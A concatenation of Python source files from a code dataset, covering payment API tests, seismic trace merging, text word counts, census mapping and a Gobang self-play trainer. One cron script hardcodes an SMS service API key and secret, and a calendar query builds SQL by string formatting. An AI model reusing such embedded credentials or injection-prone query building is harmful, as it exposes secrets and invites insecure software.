\\n\" %(\" OR \".join(ufilters))\n query.sql += \"AND (%s) \\n\" %(\" OR \".join(ufilters))\n query.sql += \"AND (([Activity].Private IS NULL or [Activity].Private = 0) OR (%s))\" % makeSetFieldFilter(\"Activity\",\"Users\",currentUser())\n \n sched = {}\n if query.open():\n for act in query:\n actusers = map(lambda x: x.strip(),act.Users.split(','))\n for person in self.Persons:\n if person in actusers:\n if not sched.has_key(person): sched[person] = []\n actdict = {\"Comment\": act.Comment, \"StartTime\": act.StartTime, \"EndTime\":act.EndTime,\"ActivityType\":act.ActivityType,\"ActivitySubType\":act.ActivitySubType, \"internalId\":act.internalId,\"Status\":act.Status, \"StartDate\":act.StartDate, \"EndDate\":act.EndDate, \"Detail\": act.Detail.decode(\"latin1\")}\n sched[person].append(actdict)\n query.close\n return sched\n\n\n","sub_path":"standard/tools/CalendarDayVisual.py","file_name":"CalendarDayVisual.py","file_ext":"py","file_size_in_byte":8032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"316243996","text":"import unittest\nimport time\n\nfrom tests.lib.client import get_client\n\n\nclass TestGpaOrdersCreate(unittest.TestCase):\n \"\"\"Tests for the gpa_orders.create endpoint.\"\"\"\n\n def setUp(self):\n \"\"\"Setup each test.\"\"\"\n\n self.client = get_client()\n\n def get_user_payment_card_request(self, user_token):\n \"\"\"Returns a payment card request for a user.\"\"\"\n\n return {\n \"user_token\": user_token,\n \"account_number\": \"4112344112344113\",\n \"cvv_number\": \"123\",\n \"exp_date\": \"0323\",\n \"zip\": \"94612\"\n }\n\n def get_user_card_holder_address_request(self, user_token):\n \"\"\"Returns a payment card address request for a user.\"\"\"\n\n return {\n \"user_token\": user_token,\n \"first_name\": \"Marqeta\",\n \"last_name\": \"QE\",\n \"address_1\": \"180 Grand Ave.\",\n \"city\": \"Oakland\",\n \"state\": \"CA\",\n \"zip\": \"94612\",\n \"country\": \"USA\"\n }\n\n def get_user_ach_request(self, user_token):\n \"\"\"Returns a ach funding sourde request for a user.\"\"\"\n\n # Routing number is for Wells Fargo, CA checking accounts\n return {\n \"user_token\": user_token,\n \"account_number\": \"12345678901234567\",\n \"routing_number\": \"121042882\",\n \"name_on_account\": \"Marqeta QE\",\n \"account_type\": \"checking\"\n }\n\n def get_program_name(self):\n \"\"\"Returns a unique program name.\"\"\"\n return \"qe_program_\" + str(int(time.time() % 1000000000))\n\n def verify_gpa_order(self, response, verify):\n \"\"\"\n\n Verifies a GPA order matches the expected values.\n\n Parameters:\n response (GpaResponse): The GPA order to verify.\n\n verify (Dictionary): The values that should be in the response.\n\n \"\"\"\n\n # Verify the expected attributes are defined\n expected_attributes = ['token', 'amount', 'created_time', 'last_modified_time', 'transaction_token', 'state',\n 'response', 'funding', 'funding_source_token', 'currency_code']\n\n for attribute in expected_attributes:\n with self.subTest(f'{attribute} is not defined'):\n self.assertIsNotNone(getattr(response, attribute))\n\n # Verify values match expected values\n match_attributes = list(verify.keys())\n\n for attribute in match_attributes:\n with self.subTest(f'{attribute} does not match the expected value'):\n self.assertEqual(getattr(response, attribute),\n verify[attribute])\n\n def verify_gpa_order_program(self, response, verify):\n \"\"\"\n\n Verifies a GPA order for a program funding source matches the expected values.\n\n Parameters:\n response (GpaResponse): The GPA order to verify.\n\n verify (Dictionary): The values that should be in the response.\n\n \"\"\"\n\n # Verify the expected attributes are defined\n expected_attributes = ['token', 'amount', 'created_time', 'last_modified_time', 'transaction_token', 'state',\n 'response', 'funding', 'funding_source_token', 'currency_code']\n\n for attribute in expected_attributes:\n with self.subTest(f'{attribute} is not defined'):\n self.assertIsNotNone(getattr(response, attribute))\n\n # Verify values match expected values\n match_attributes = list(verify.keys())\n\n for attribute in match_attributes:\n # funding_source_token is masked for program funding sources\n if attribute == 'funding_source_token':\n continue\n with self.subTest(f'{attribute} does not match the expected value'):\n self.assertEqual(getattr(response, attribute),\n verify[attribute])\n\n def test_gpa_orders_create_payment_card_user(self):\n \"\"\"Creates a gpa order funded by a user payment card.\"\"\"\n\n user = self.client.users.create({})\n\n card_request = self.get_user_payment_card_request(user.token)\n\n payment_card = self.client.funding_sources.payment_card.create(\n card_request)\n\n address_request = self.get_user_card_holder_address_request(user.token)\n\n address = self.client.funding_sources.addresses.create(address_request)\n\n gpa_request = {\n \"user_token\": user.token,\n \"amount\": 100.00,\n \"currency_code\": \"USD\",\n \"funding_source_token\": payment_card.token,\n \"funding_source_address_token\": address.token\n }\n\n order = self.client.gpa_orders.create(gpa_request)\n\n self.verify_gpa_order(order, gpa_request)\n\n def test_gpa_orders_create_ach_user(self):\n \"\"\"Creates a gpa order funded by a user ach.\"\"\"\n\n user = self.client.users.create({})\n\n ach_request = self.get_user_ach_request(user.token)\n\n ach_source = self.client.funding_sources.ach.create(ach_request)\n\n amounts = self.client.funding_sources.ach(\n ach_source.token).verification_amounts()\n\n ach_verification = {\n \"verify_amount1\": amounts.verify_amount1,\n \"verify_amount2\": amounts.verify_amount2\n }\n\n self.client.funding_sources.ach.save(\n ach_source.token, ach_verification)\n\n gpa_request = {\n \"user_token\": user.token,\n \"amount\": 100.00,\n \"currency_code\": \"USD\",\n \"funding_source_token\": ach_source.token\n }\n\n order = self.client.gpa_orders.create(gpa_request)\n\n self.verify_gpa_order(order, gpa_request)\n\n def test_gpa_orders_create_program_user(self):\n \"\"\"Creates a gpa order funded by a program.\"\"\"\n\n user = self.client.users.create({})\n\n program_funding_source_request = {\n \"name\": self.get_program_name()\n }\n\n program = self.client.funding_sources.program.create(\n program_funding_source_request)\n\n gpa_request = {\n \"user_token\": user.token,\n \"amount\": 100.00,\n \"currency_code\": \"USD\",\n \"funding_source_token\": program.token\n }\n\n order = self.client.gpa_orders.create(gpa_request)\n\n self.verify_gpa_order_program(order, gpa_request)\n","sub_path":"tests/gpa_orders/test_gpa_orders_create.py","file_name":"test_gpa_orders_create.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"60772311","text":"#!/usr/bin/env python\n__author__ = 'toopazo'\n\nimport argparse\nimport os\nfrom obspy.core import read\nfrom obspy.core import Trace, Stream\n# from obspy.core import Trace, Stream, UTCDateTime\n# import numpy as np\n# import dateutil.parser\n# from datetime import datetime, timedelta\n\n\ndef collect_traces(infile1,\n infile2,\n infile3,\n outfile):\n\n # 1) Make sure user inputs are correct (Convert to real -no symlink- and full path)\n file = infile1\n file = os.path.normcase(file)\n file = os.path.normpath(file)\n file = os.path.realpath(file)\n infile1 = file\n print(infile1)\n\n file = infile2\n file = os.path.normcase(file)\n file = os.path.normpath(file)\n file = os.path.realpath(file)\n infile2 = file\n print(infile2)\n\n file = infile3\n file = os.path.normcase(file)\n file = os.path.normpath(file)\n file = os.path.realpath(file)\n infile3 = file\n print(infile3)\n\n # 2) Get traces\n st = read(infile1)\n tr1 = st[0]\n st = read(infile2)\n tr2 = st[0]\n st = read(infile3)\n tr3 = st[0]\n\n # 3) Collect traces\n st = Stream([tr1, tr2, tr3])\n\n # >> Write to disk\n # print(tuple_header_starttime)\n outfile_name = outfile\n st.write(outfile_name, format='MSEED', encoding=11, reclen=256, byteorder='>')\n # st.write(outfile_name, format='MSEED', encoding=0, reclen=256)\n st = read(outfile_name)\n arg = \"[tuple2mseed] MSEED created: %s\" % st[0]\n print(arg)\n # print(st1[0])\n # print(st1[0].stats)\n # print(st1[0].data)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Plot given file(s) (obspy wrapper)')\n parser.add_argument('--infile1', action='store', help='files to process', required=True)\n parser.add_argument('--infile2', action='store', help='files to process', required=True)\n parser.add_argument('--infile3', action='store', help='files to process', required=True)\n parser.add_argument('--outfile', action='store', help='files to process', required=True)\n # parser.add_argument('--ch1', action='store', help='channel signal', required=True)\n # parser.add_argument('--ch2', action='store', help='channel signal', required=True)\n # parser.add_argument('--ch3', action='store', help='channel signal', required=True)\n # parser.add_argument('--ch4', action='store', help='channel signal', required=True)\n args = parser.parse_args()\n\n collect_traces(infile1=args.infile1,\n infile2=args.infile2,\n infile3=args.infile3,\n outfile=args.outfile)\n","sub_path":"ss_collectTraces.py","file_name":"ss_collectTraces.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"402072412","text":"from collections import defaultdict\n\n\ndef read_mecab_file():\n result = []\n with open('neko.txt.mecab', 'r') as f:\n line = f.readline()\n while len(line) > 0:\n # ref. http://taku910.github.io/mecab/#parse\n surface, other = line.split('\\t')\n other_list = other.split(',')\n result_dict = {\n 'surface': surface,\n 'base': other_list[6],\n 'pos': other_list[0],\n 'pos1': other_list[1]\n }\n result.append(result_dict)\n\n line = f.readline()\n if 'EOS' in line:\n break\n return result\n\n\ndef main():\n result = read_mecab_file()\n bag_of_words = defaultdict(int)\n for row in result:\n bag_of_words[row['surface']] += 1\n for k, v in sorted(bag_of_words.items(), key=lambda x: x[1], reverse=True):\n print(f'word : {k} / count: {v}')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"chapter_4/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"300457952","text":"# String\nss = 'Python is the best'\nprint(ss[1:3])\nprint(len(ss))\n\n\n# Printing String in reverse\n# 문자열 거꾸로 출력\ninStr = input('Enter a String: ')\nlength = len(inStr)\noutStr = ''\n\nfor i in range(0, length):\n outStr += inStr[length-i-1] # index는 0부터 시작하므로 -1\nprint(outStr)\n\n","sub_path":"python_study/ch08string/ch08_string.py","file_name":"ch08_string.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"491303765","text":"##############################################################################\n# Assignment: Homework #04 (Exercise 2)\n# Class Section: Wednesday, 6:30, ARMS 1010\n# Description: This program accepts and validates two integer values and determines\n# which is the greater of the two\n# Programmers: Oluwatosin Ogunjobi oogunjob@purdue.edu\n#############################################################################\n\n# this function determines which is the greater integer passed to it between two number\n# this function returns either x or y depending on which of the two was the greatest\ndef maxInteger(x, y):\n if(x > y):\n return x\n else:\n return y\n\n# this function accepts two numbers and validates if they are integers to be sent to maxInteger\n# this is a void function that returns no value\ndef main():\n firstInteger = float(input(\"Enter the first integer: \")) # first number given\n secondInteger = float(input(\"Enter the second integer: \")) # second number given\n \n if(not(firstInteger.is_integer())): # determines wheter the first value is an integer\n print(\"{0} is not an integer.\".format(firstInteger))\n \n elif(not(secondInteger.is_integer())): # determines wheter the second value is an integer\n print(\"{0} is not an integer.\".format(secondInteger))\n \n if(firstInteger.is_integer() and secondInteger.is_integer()): # if both are valid integers, finds the greater of the two\n greaterInteger = maxInteger(firstInteger, secondInteger)\n print(\"%d is greater.\" % (greaterInteger)) # prints the greater integer\n \nmain()\n","sub_path":"week4/hw04_2.py","file_name":"hw04_2.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"321461227","text":"def remove_duplicates_in_array(array):\n unique_elem = set()\n for elem in array:\n if elem not in unique_elem:\n yield elem\n unique_elem.add(elem)\n\n\ndef select_place_from_top_list(top_list, prize):\n for index, elem in enumerate(top_list, 1):\n if prize >= elem:\n return index\n elif index == len(top_list):\n return index + 1\n\n\ndef get_history_successes(top_list, successes_data_team):\n history_successes = []\n sum_prev_results = 0\n top_list = list(remove_duplicates_in_array(top_list))\n for prize in successes_data_team:\n sum_prev_results += prize\n place = select_place_from_top_list(top_list, sum_prev_results)\n history_successes.append(place)\n\n return history_successes\n","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"253727092","text":"from DeadlineReminderApp.models import Deadline\nfrom jdatetime import datetime\nimport persian, requests, json\n\n\ndef job():\n current_time = datetime.now()\n for deadline in Deadline.objects.all():\n x = deadline.due_date\n difference = (datetime(x.year, x.month, x.day) - current_time)\n if difference.days < deadline.send_message_before_days:\n pass\n send_SMS(\"YAY\", \"09172147407\")\n\n\ndef send_SMS(text, number):\n sms_key = \"97730a8df134abeebf810a8d\"\n sms_secret_key = \"ehsan_karimi_hamiss\"\n sms_number = \"50002015806469\"\n url = 'http://RestfulSms.com/api/Token'\n data = {\n 'UserApiKey': sms_key,\n 'SecretKey': sms_secret_key\n }\n resp = requests.post(url, data)\n content = resp.content\n\n js = json.loads(content.decode(\"utf8\"))\n\n print(js)\n token = js['TokenKey']\n\n header = {\n 'x-sms-ir-secure-token': token\n }\n\n dic = {\n 'Messages': [text],\n 'MobileNumbers': [number],\n 'LineNumber': sms_number,\n 'SendDateTime': '',\n 'CanContinueInCaseOfError': 'false'\n }\n url = 'http://RestfulSms.com/api/MessageSend'\n print(dic, header)\n result = requests.post(url, dic, headers=header)\n print(result.content)\n","sub_path":"DeadlineReminderApp/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552459089","text":"import os\nimport json\nimport logging.config\n\n\ndef configure_logging(configure_file_path=\"LogConfigure.json\", default_level=logging.INFO, env_key=\"LOG_CFG\"):\n path = configure_file_path\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(path):\n print(\"logging_config.json path exit\")\n with open(path, \"r\") as f:\n config = json.load(f)\n logging.config.dictConfig(config)\n else:\n print(\"logging_config.json path not exit\")\n logging.basicConfig(level=default_level)\n\n\ndef set_log_info():\n logging.info(\"Let's start to log some information.\")\n\n logging.error(\"There are so many errors.\")\n logging.info(\"go\")\n\n\nif __name__ == \"__main__\":\n configure_logging(\"logging_config.json\")\n set_log_info()","sub_path":"text_matching/souhu/roberta_wwm_base/loadlog.py","file_name":"loadlog.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"86951628","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\nfrom mpl_toolkits.basemap import Basemap\nimport pandas as pd\nfrom matplotlib.patches import Polygon\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import PathPatch\n\n#PUMA,ST: state,NRC: Number of children,NPF: number of people,ACCESS: access to Internet (3: No)\ndata = pd.read_csv(\"/home/krishna/Documents/My_Docs/PBL/data/pums/hou_chil_without_null.csv\")\n\ndata=data.dropna(axis=0)\n\n#number of children without Net in each PUMA\nnoNet=data[data['ACCESS']==3].set_index(['ST','PUMA']).NRC\nnoNet=noNet.reset_index().groupby(['ST','PUMA']).sum().reset_index()\n\n#total number of children in each PUMA\ntotalNum=data.groupby(['ST','PUMA']).NRC.sum().reset_index()\n\n#percentage of children without Internet access in each PUMA\nnoNet['perc']=noNet['NRC']/totalNum['NRC']*100\nnoNet=noNet.groupby(['ST', 'PUMA'])['perc'].sum().reset_index()\n\n#plotting\nstate_codes = {'01': 'Alabama', \n '04': 'Arizona', \n '05': 'Arkansas', \n '06': 'California', \n '08': 'Colorado', \n '09': 'Connecticut', \n '10': 'Delaware', \n '11': 'District of Columbia', \n '12': 'Florida', \n '13': 'Georgia', \n '15': 'Hawaii', \n '16': 'Idaho', \n '17': 'Illinois', \n '18': 'Indiana', \n '19': 'Iowa',\n '20': 'Kansas', \n '21': 'Kentucky', \n '22': 'Louisiana', \n '23': 'Maine', \n '24': 'Maryland', \n '25': 'Massachusetts', \n '26': 'Michigan', \n '27': 'Minnesota', \n '28': 'Mississippi', \n '29': 'Missouri', \n '30': 'Montana', \n '31': 'Nebraska', \n '32': 'Nevada', \n '33': 'New Hampshire', \n '34': 'New Jersey', \n '35': 'New Mexico', \n '36': 'New York', \n '37': 'North Carolina', \n '38': 'North Dakota', \n '39': 'Ohio', \n '40': 'Oklahoma', \n '41': 'Oregon', \n '42': 'Pennsylvania', \n '44': 'Rhode Island', \n '45': 'South Carolina', \n '46': 'South Dakota', \n '47': 'Tennessee', \n '48': 'Texas', \n '49': 'Utah', \n '50': 'Vermont', \n '51': 'Virginia', \n '53': 'Washington', \n '54': 'West Virginia', \n '55': 'Wisconsin', \n '56': 'Wyoming', \n } \n\n\nnum=10\ncm=plt.get_cmap('hot')\nreds=[cm(1.0*i/num) for i in range(num-1,-1,-1)]\ncmap = mpl.colors.ListedColormap(reds)\n\nfig = plt.figure(figsize=(10,5))\nax = fig.add_subplot(111, axisbg='w', frame_on=False)\nfig.suptitle('Percentage of children without Internet access', fontsize=20)\n\nm = Basemap(width=5000000,height=3500000,resolution='l',projection='aea',lat_1=30.,lat_2=50,lon_0=-96,lat_0=38)\n\nfor key in state_codes.keys():\n m.readshapefile('/home/krishna/Documents/My_Docs/PBL/data/shapefiles/pums/tl_2013_{0}_puma10'.format(key), name='state', drawbounds=True)\n new_key = int(key)\n \n for info, shape in zip(m.state_info, m.state):\n id=int(info['PUMACE10'])\n value=noNet[(noNet['ST']==new_key) & (noNet['PUMA']==id)]['perc']\n color=int(value/10)\n patches = [Polygon(np.array(shape), True)]\n pc = PatchCollection(patches, edgecolor='k', linewidths=1., zorder=2)\n pc.set_color(reds[color])\n ax.add_collection(pc)\n\nax2 = fig.add_axes([0.82, 0.1, 0.03, 0.8])\nbounds=np.linspace(0,10,num)\ncb = mpl.colorbar.ColorbarBase(ax2, cmap=cmap, ticks=bounds, boundaries=bounds)\ncb.ax.set_yticklabels([str(round(i)*10) for i in bounds])\n\nplt.show()\nplt.savefig(\"children_without_internet_access.png\")\n","sub_path":"child_no_int_acc_.py","file_name":"child_no_int_acc_.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"132433473","text":"from collections import deque\nfrom Arena import Arena\nfrom MCTS import MCTS\nimport numpy as np\nfrom pytorch_classification.utils import Bar, AverageMeter\nimport time, os\nfrom pickle import Pickler, Unpickler\nimport tensorflow as tf\nimport multiprocessing\nfrom gobang.tensorflow.NNet import NNetWrapper as nn\nfrom gobang.GobangGame import display\nfrom gobang.GobangPlayers import *\nimport logging as log\nfrom utils import *\n\n# python logging doenst work with tf-1.14\nclass MyLogger:\n filename = \"capabilities.log\"\n \n def log(msg):\n with open(MyLogger.filename, \"a\") as myfile:\n myfile.write(msg+\"\\n\")\n def info(msg):\n MyLogger.log(\"INFO:\"+msg)\n def warning(msg):\n MyLogger.log(\"WARNING:\"+msg)\n def error(msg):\n MyLogger.log(\"ERROR:\"+msg)\n \n\ndef AsyncSelfPlay(game,args,iter_num,bar):\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[iter_num%len(gpus)]\n\n #set gpu memory grow\n config = tf.ConfigProto() \n config.gpu_options.allow_growth=True \n sess = tf.Session(config=config)\n\n #create nn and load weight\n net = nn(game, args.displaybar)\n try:\n net.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n print(\"No best model found\")\n pass\n mcts = MCTS(game, net,args, args.lambdaHeur)\n\n # create separate seeds for each worker\n np.random.seed(iter_num)\n \n # create a list for store game state\n returnlist = []\n for i in range(args.numPerProcessSelfPlay):\n # Each process play many games, so do not need initial NN every times when process created.\n\n if args.displaybar:\n bar.suffix = \"iter:{i}/{x} | Total: {total:} | ETA: {eta:}\".format(\n i=i+1,x=args.numPerProcessSelfPlay,total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n\n trainExamples = []\n board = game.getInitBoard()\n curPlayer = 1\n episodeStep = 0\n\n boardSize = np.product(np.shape(board))\n while True:\n templist = []\n episodeStep += 1\n temp = 1 if episodeStep < args.tempThreshold else episodeStep - args.tempThreshold\n\n pi, counts = mcts.getActionProb(board, curPlayer=curPlayer, temp=temp,debug=True)\n action = np.random.choice(len(pi), p=pi)\n mtx = mcts.heuristic.get_field_stregth_mtx(board, 1)\n heuristic_components = mcts.heuristic.get_x_line_mtx(board, 1)\n shape = list(board.shape)+[1]\n trainExamples.append([np.concatenate([np.reshape(board,shape),\n np.reshape(mtx, shape),\n heuristic_components], axis=2),\n curPlayer, pi, None])\n \n #action = np.random.choice(len(pi), p=pi)\n board, curPlayer = game.getNextState(board, curPlayer, action)\n\n r = game.getGameEnded(board, curPlayer, action)\n if r!=0: # game is over\n reward0 = r*(float(boardSize-episodeStep+1)/(boardSize))\n #reward0=r*(1/episodeStep)\n mylist = []\n # === Log info ===\n if False :\n print(\"\\n\",r, curPlayer, \"\\n\")\n display(board, end = True)\n np.set_printoptions(precision=5)\n print(np.resize(pi[:-1],board.shape()).transpose())\n print(\"\")\n\n for i,x in enumerate(reversed(trainExamples[args.learnFromEnd:])):\n reward = (args.coeff**(i//2))*reward0*((-1)**(x[1]!=curPlayer))\n mylist.append((x[0], x[1], x[2], reward))\n templist.append(list(mylist))\n returnlist.append(templist)\n break\n\n return returnlist\n\ndef AsyncTrainNetwork(game,args,trainhistory):\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[0]\n #create network for training\n nnet = nn(game, args.displaybar)\n try:\n nnet.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n #print(\"Retrain best model\")\n except:\n pass\n #---load history file---\n modelFile = os.path.join(args.checkpoint, \"trainhistory.pth.tar\")\n examplesFile = modelFile+\".examples\"\n if not os.path.isfile(examplesFile):\n print(examplesFile)\n else:\n print(\"File with trainExamples found. Read it.\")\n with open(examplesFile, \"rb\") as f:\n for i in Unpickler(f).load():\n trainhistory.append(i)\n f.closed\n #----------------------\n #---delete if over limit---\n if len(trainhistory) > args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(trainhistory), \" => remove the oldest trainExamples\")\n del trainhistory[len(trainhistory)-1]\n #-------------------\n #---extend history---\n trainExamples = []\n for e in trainhistory:\n trainExamples.extend(np.array(e))\n\n #for e in trainhistory[:10]:\n # print(e)\n #---save history---\n folder = args.checkpoint\n if not os.path.exists(folder):\n os.makedirs(folder)\n filename = os.path.join(folder, 'trainhistory.pth.tar'+\".examples\")\n with open(filename, \"wb+\") as f:\n Pickler(f).dump(trainhistory)\n f.closed\n #------------------\n nnet.train(trainExamples)\n nnet.save_checkpoint(folder=args.checkpoint, filename='train.pth.tar')\n\n #print(trainExamples[0][0].transpose(), trainExamples[0][2])\n print(len(trainExamples))\n \ndef AsyncAgainst(game,args,iter_num,bar):\n # create separate seeds for each worker\n np.random.seed(iter_num)\n\n if args.displaybar:\n bar.suffix = \"iter:{i}/{x} | Total: {total:} | ETA: {eta:}\".format(\n i=iter_num+1,x=args.numAgainstPlayProcess,total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[iter_num%len(gpus)]\n\n #set gpu memory grow\n config = tf.ConfigProto()\n config.gpu_options.allow_growth=True \n sess = tf.Session(config=config)\n \n #create nn and load\n nnet = nn(game, args.displaybar)\n pnet = nn(game, args.displaybar)\n try:\n nnet.load_checkpoint(folder=args.checkpoint, filename='train.pth.tar')\n except:\n print(\"load train model fail\")\n pass\n try:\n pnet.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n print(\"load old model fail\")\n filepath = os.path.join(args.checkpoint, \"best.pth.tar\")\n pnet.save_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n pmcts = MCTS(game, pnet, args, args.lambdaHeur)\n nmcts = MCTS(game, nnet, args, args.lambdaHeur)\n\n arena = Arena(lambda b, p: np.argmax(pmcts.getActionProb(board=b, curPlayer=p, temp=1)),\n lambda b, p: np.argmax(nmcts.getActionProb(board=b, curPlayer=p, temp=1)),\n game, displaybar=args.displaybar)\n # each against process play the number of numPerProcessAgainst games.\n pwins, nwins, draws = arena.playGames(args.numPerProcessAgainst)\n return pwins, nwins, draws\n\ndef CheckResultAndSaveNetwork(pwins,nwins,draws,game,args,iter_num):\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[iter_num%len(gpus)]\n\n if float(nwins)/(pwins+nwins) > args.updateThreshold or (\n nwins==pwins and draws > args.updateThreshold):\n print('ACCEPTING NEW MODEL')\n net = nn(game, args.displaybar)\n net.load_checkpoint(folder=args.checkpoint, filename='train.pth.tar')\n net.save_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n net.save_checkpoint(folder=args.checkpoint, filename='checkpoint_' + str(iter_num) + '.pth.tar')\n else:\n print('REJECTING NEW MODEL')\n MyLogger.info('REJECTING NEW MODEL')\n print(draws)\n\ndef play_games(game, args, processID, enemy):\n np.random.seed(processID)\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[processID%len(gpus)]\n \n #set gpu memory grow\n config = tf.ConfigProto()\n config.gpu_options.allow_growth=True \n sess = tf.Session(config=config)\n\n \n # Players:\n heuristic = Heuristic(game).random_play\n policy = PolicyPlayer(game).play\n rp = RandomPlayer(game).play\n\n if enemy == \"heuristic\": second_player = heuristic\n elif enemy == \"rp\": second_player = rp\n elif enemy == \"n1p\":\n # improved nnet player\n n1 = nn(game)\n n1.load_checkpoint('./temp/','best.pth.tar')\n mcts1 = MCTS(game, n1, args, lambdaHeur=args.lambdaHeur)\n n1p = lambda b, p: np.argmax(mcts1.getActionProb(b, p, temp=0))\n\n second_player = n1p\n arena = Arena(n1p, heuristic, game, display=display)\n return arena.playGames(args.numPerProcessAgainst, verbose=False)\n\n arena = Arena(policy, second_player, game, display=display)\n \n return arena.playGames(args.numPerProcessAgainst, verbose=False)\n \ndef run_arena_parallel(arena, args):\n pool = multiprocessing.Pool(processes=args.numAgainstPlayProcess)\n res = []\n for i in range(args.numAgainstPlayProcess):\n res.append(pool.apply_async(play_games,\n args=[arena, args.numPerProcessAgainst, i]))\n pool.close()\n pool.join()\n\n res2 = [r.get() for r in res]\n print(res2)\n return np.sum(res2, axis=0)[:2]\n \ndef logCurrentCapabilities(game, iter_num, args):\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[iter_num%len(gpus)]\n \n # improved nnet player\n n2 = nn(game)\n n2.load_checkpoint('./temp/','best.pth.tar')\n #args2 = dotdict({'numMCTSSims': args.numMCTSSims, 'cpuct':args.cpuct, 'multiGPU':True})\n mcts2 = MCTS(game, n2, args)\n n2p = lambda b, p: np.argmax(mcts2.getActionProb(b, p, temp=0))\n\n # Heuristic player:\n heuristic = Heuristic(game).random_play\n\n # Random Player:\n rp = RandomPlayer(game).play\n\n arena = Arena(n2p, heuristic, game, display=display)\n resultHeur = \"{} {}\".format(*arena.playGames(40, verbose=False)[:2])\n \n arena = Arena(n2p, rp, game, display=display)\n resultRand = \"{} {}\".format(*arena.playGames(40, verbose=False)[:2])\n \n MyLogger.info(\"Iter:{} Heuristic: {} Random: {}\".format(iter_num, resultHeur, resultRand))\n print(\"Iter:{} Heuristic: {} Random: {}\\n\".format(iter_num, resultHeur, resultRand))\n \nclass Coach():\n \"\"\"\n This class executes the self-play + learning. It uses the functions defined\n in Game and NeuralNet. args are specified in main.py.\n \"\"\"\n def __init__(self, game, args):\n self.game = game\n self.args = args\n self.trainExamplesHistory = []\n\n def parallel_self_play(self):\n temp = []\n result = []\n bar = Bar('Self Play(each process)', max=self.args.numPerProcessSelfPlay)\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=self.args.numSelfPlayProcess)\n res = []\n for i in range(self.args.numSelfPlayProcess):\n res.append(pool.apply_async(AsyncSelfPlay,args=(self.game,self.args,i,bar,)))\n pool.close()\n pool.join()\n for i in res:\n result.append(i.get())\n else:\n result.append(AsyncSelfPlay(self.game, self.args, 0, bar))\n \n for i in result:\n for j in i:\n for trainData in j:\n temp += trainData\n return temp\n\n def parallel_train_network(self,iter_num):\n print(\"Start train network\")\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=1)\n pool.apply_async(AsyncTrainNetwork,args=(self.game,self.args,self.trainExamplesHistory,))\n pool.close()\n pool.join()\n else:\n AsyncTrainNetwork(self.game, self.args, self.trainExamplesHistory)\n\n def parallel_self_test_play(self,iter_num):\n print(\"Start test play\")\n bar = Bar('Test Play', max=self.args.numAgainstPlayProcess)\n result = []\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=self.args.numAgainstPlayProcess)\n res = []\n for i in range(self.args.numAgainstPlayProcess):\n res.append(pool.apply_async(AsyncAgainst,args=(self.game,self.args,i,bar)))\n pool.close()\n pool.join()\n for i in res:\n result.append(i.get())\n else:\n result.append(AsyncAgainst(self.game, self.args, 0, bar))\n\n pwins = 0\n nwins = 0\n draws = 0.0\n for i in result:\n pwins += i[0]\n nwins += i[1]\n draws += i[2]\n\n draws /= len(result)\n print(\"pwin: \"+str(pwins))\n print(\"nwin: \"+str(nwins))\n print(\"draw: \"+str(draws))\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=1)\n pool.apply_async(CheckResultAndSaveNetwork,args=(pwins,nwins,draws,self.game,self.args,iter_num,))\n pool.close()\n pool.join()\n else:\n CheckResultAndSaveNetwork(pwins, nwins, draws, self.game, self.args, iter_num)\n\n def parallel_check_against(self, iter_num, enemy):\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=self.args.numAgainstPlayProcess)\n res = []\n for i in range(self.args.numAgainstPlayProcess):\n res.append(pool.apply_async(play_games,\n args=(self.game, self.args, i, enemy)))\n 